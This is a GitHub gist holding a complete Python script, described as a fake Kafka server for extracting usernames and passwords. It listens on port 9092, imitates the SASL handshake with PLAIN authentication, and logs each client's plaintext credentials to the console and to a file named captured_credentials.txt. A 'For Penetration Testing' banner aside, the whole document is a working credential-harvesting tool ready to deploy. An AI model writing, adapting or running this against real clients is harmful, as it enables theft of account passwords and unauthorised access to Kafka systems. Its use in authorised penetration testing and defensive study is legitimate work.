Skip to content

Instantly share code, notes, and snippets.

@X-Cotang
Created December 15, 2025 07:48
Show Gist options
  • Select an option

  • Save X-Cotang/fcf1ac367f2b4a1c76a83402d796dbcf to your computer and use it in GitHub Desktop.

Select an option

Save X-Cotang/fcf1ac367f2b4a1c76a83402d796dbcf to your computer and use it in GitHub Desktop.
Fake Kafka server used to extract usernames and passwords.
#!/usr/bin/env python3
import socket
import struct
import threading
import logging
from datetime import datetime
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s'
)
class KafkaAuthCapture:
def __init__(self, host='0.0.0.0', port=9092):
self.host = host
self.port = port
self.server = None
self.captured_creds = []
def parse_sasl_handshake(self, data):
"""Parse SASL handshake request"""
try:
if len(data) < 8:
return None
length = struct.unpack('>I', data[:4])[0]
api_key = struct.unpack('>H', data[4:6])[0]
logging.info(f"Received API Key: {api_key}, Length: {length}")
if api_key in [17, 36]:
return True
except Exception as e:
logging.error(f"Parse error: {e}")
return None
def parse_sasl_plain(self, data):
try:
if len(data) >= 5 and data[4:5] == b'\x00':
payload = data[5:]
parts = payload.split(b'\x00')
if len(parts) >= 2:
username = parts[0].decode('utf-8', errors='ignore')
password = parts[1].decode('utf-8', errors='ignore')
return {
'authzid': '',
'username': username,
'password': password,
'timestamp': datetime.now().isoformat()
}
null_positions = [i for i, byte in enumerate(data) if byte == 0]
if len(null_positions) >= 2:
for i in range(len(null_positions) - 1):
start = null_positions[i]
end = null_positions[i + 1]
username_candidate = data[start+1:end]
if i + 1 < len(null_positions):
password_start = null_positions[i + 1] + 1
password_end = null_positions[i + 2] if i + 2 < len(null_positions) else len(data)
password_candidate = data[password_start:password_end]
if len(username_candidate) > 0 and len(password_candidate) > 0:
try:
username = username_candidate.decode('utf-8')
password = password_candidate.decode('utf-8')
if username.isprintable() and password.isprintable():
return {
'authzid': '',
'username': username,
'password': password,
'timestamp': datetime.now().isoformat()
}
except:
continue
except Exception as e:
logging.error(f"SASL parse error: {e}")
return None
def send_response(self, client, api_key):
try:
if api_key == 17:
response = struct.pack('>I', 0)
response += struct.pack('>H', 0)
response += struct.pack('>I', 1)
response += struct.pack('>H', 5)
response += b'PLAIN'
length = struct.pack('>I', len(response))
client.send(length + response)
elif api_key == 36:
response = struct.pack('>I', 0)
response += struct.pack('>H', 0)
response += struct.pack('>I', 0)
length = struct.pack('>I', len(response))
client.send(length + response)
except Exception as e:
logging.error(f"Send response error: {e}")
def handle_client(self, client, addr):
"""Xử lý kết nối từ client"""
logging.info(f"[+] New connection from {addr[0]}:{addr[1]}")
try:
while True:
data = client.recv(4096)
if not data:
break
logging.debug(f"Raw data: {data[:100].hex()}")
if self.parse_sasl_handshake(data):
api_key = struct.unpack('>H', data[4:6])[0]
self.send_response(client, api_key)
creds = self.parse_sasl_plain(data)
if creds:
logging.warning(f"\n{'='*60}")
logging.warning(f"[!] CREDENTIALS CAPTURED from {addr[0]}:{addr[1]}")
logging.warning(f" Username: {creds['username']}")
logging.warning(f" Password: {creds['password']}")
logging.warning(f" Time: {creds['timestamp']}")
logging.warning(f"{'='*60}\n")
self.captured_creds.append({
'client': f"{addr[0]}:{addr[1]}",
**creds
})
with open('captured_credentials.txt', 'a') as f:
f.write(f"\n[{creds['timestamp']}] {addr[0]}:{addr[1]}\n")
f.write(f"Username: {creds['username']}\n")
f.write(f"Password: {creds['password']}\n")
f.write("-" * 60 + "\n")
except Exception as e:
logging.error(f"Client handler error: {e}")
finally:
client.close()
logging.info(f"[-] Connection closed from {addr[0]}:{addr[1]}")
def start(self):
try:
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server.bind((self.host, self.port))
self.server.listen(5)
logging.info(f"[*] Kafka Auth Capture Server listening on {self.host}:{self.port}")
logging.info(f"[*] Waiting for connections...")
logging.info(f"[*] Captured credentials will be saved to: captured_credentials.txt\n")
while True:
client, addr = self.server.accept()
client_thread = threading.Thread(
target=self.handle_client,
args=(client, addr)
)
client_thread.daemon = True
client_thread.start()
except KeyboardInterrupt:
logging.info("\n[*] Shutting down server...")
self.print_summary()
except Exception as e:
logging.error(f"Server error: {e}")
finally:
if self.server:
self.server.close()
def print_summary(self):
if self.captured_creds:
print(f"\n{'='*60}")
print(f"SUMMARY - Total captured: {len(self.captured_creds)} credentials")
print(f"{'='*60}")
for i, cred in enumerate(self.captured_creds, 1):
print(f"\n{i}. Client: {cred['client']}")
print(f" Username: {cred['username']}")
print(f" Password: {cred['password']}")
print(f" Time: {cred['timestamp']}")
print(f"\n{'='*60}\n")
else:
print("\n[*] No credentials captured\n")
if __name__ == '__main__':
print("""
╔══════════════════════════════════════════════════════╗
║ Kafka Authentication Capture Tool ║
║ For Penetration Testing - Use Responsibly ║
╚══════════════════════════════════════════════════════╝
""")
server = KafkaAuthCapture(host='0.0.0.0', port=9092)
server.start()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment